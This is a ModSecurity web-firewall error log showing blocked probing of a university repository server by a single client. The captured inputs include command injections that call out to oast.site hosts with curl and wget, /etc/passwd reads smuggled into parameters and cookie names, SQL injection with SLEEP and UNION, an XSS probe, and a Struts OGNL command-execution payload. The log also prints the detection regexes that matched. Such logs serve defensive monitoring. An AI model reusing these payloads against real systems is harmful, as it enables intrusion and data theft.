[Tue Aug 29 11:33:32.338995 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgsfegbmzbjben4.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARfwnEAAAAI"]
[Tue Aug 29 11:33:32.399948 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAASAHZYAAAAH"]
[Tue Aug 29 11:33:34.363329 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAAR@KFwAAAAF"]
[Tue Aug 29 11:33:35.321056 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARNk-0AAAAS"]
[Tue Aug 29 11:33:35.391751 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARjjN0AAAAL"]
[Tue Aug 29 11:33:36.348386 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARjjOAAAAAL"]
[Tue Aug 29 11:33:36.363028 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11IMCo-f0AAAOJKe8AAAAE"]
[Tue Aug 29 11:33:36.409163 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARjjOMAAAAL"]
[Tue Aug 29 11:33:37.350966 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARy-wEAAAAb"]
[Tue Aug 29 11:33:37.383667 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARv7T4AAAAY"]
[Tue Aug 29 11:33:38.411066 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAARjjOgAAAAL"]
[Tue Aug 29 11:33:38.421025 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARo81EAAAAT"]
[Tue Aug 29 11:33:39.325646 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAASBXRYAAAAM"]
[Tue Aug 29 11:33:40.300314 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARo810AAAAT"]
[Tue Aug 29 11:33:40.339688 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARo818AAAAT"]
[Tue Aug 29 11:33:40.404058 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARQ4AcAAAAB"]
[Tue Aug 29 11:33:41.300917 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAANsAjgAAAAD"]
[Tue Aug 29 11:33:41.409208 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARv7VMAAAAY"]
[Tue Aug 29 11:33:41.465699 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JcCo-f0AAARo82sAAAAT"]
[Tue Aug 29 11:33:43.371308 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAAQKOowAAAAs"]
[Tue Aug 29 11:33:45.439173 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASDb5oAAAAA"]
[Tue Aug 29 11:33:47.336360 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAASFedIAAAAG"]
[Tue Aug 29 11:33:47.339842 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlggxgeidc6ofwbi.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlYAAAAD"]
[Tue Aug 29 11:33:48.344925 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASAHdcAAAAH"]
[Tue Aug 29 11:33:48.376192 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlggxea3imkywqnx.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAASFedcAAAAG"]
[Tue Aug 29 11:33:49.372081 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgzaq8b53778sng.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAASEJQQAAAAE"]
